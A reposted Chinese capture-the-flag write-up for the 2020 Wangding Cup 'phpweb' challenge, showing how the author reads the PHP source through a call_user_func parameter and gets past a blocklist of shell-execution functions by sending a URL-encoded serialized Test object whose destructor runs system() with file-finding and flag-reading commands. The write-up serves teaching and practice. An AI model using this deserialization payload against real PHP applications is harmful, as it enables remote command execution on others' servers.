碼上快樂

相關內容    簡體    繁體

[網鼎杯 2020 朱雀組]phpweb

本文轉載自   查看原文   2020-05-27 10:58   1630    CTF

 

抓包看一下

 

 

date是一個函數,后面的p應該是它的參數

猜測使用了call_user_func(函數名,參數)函數

讀取源碼

func=file_get_contents&p=index.php
<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

system函數等被禁用,可以使用反序列化加url編碼繞過

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    /*
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }*/
$a = new Test();
#$a->p = 'ls ../../../';
#$a->p ="find / -name 'flag*'";
$a->p = 'cat /tmp/flagoefiu4r93';
$a->func = 'system';
print_r(urlencode(serialize($a)));

?>
func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

 

參考

https://blog.csdn.net/ChenZIDu/article/details/106197048


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [網鼎杯 2020 朱雀組]phpweb 2020網鼎杯 朱雀組 phpweb [網鼎杯 2020 朱雀組]Nmap [網鼎杯 2020 朱雀組]Nmap [網鼎杯 2020 朱雀組]Nmap 1 [網鼎杯 2020 朱雀組]Nmap [網鼎杯 2020 朱雀組]Think Java 【網鼎杯2020朱雀組】Web WriteUp [網鼎杯2020朱雀組]Web部分wp 刷題記錄:[網鼎杯 2020 朱雀組]Think Java
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM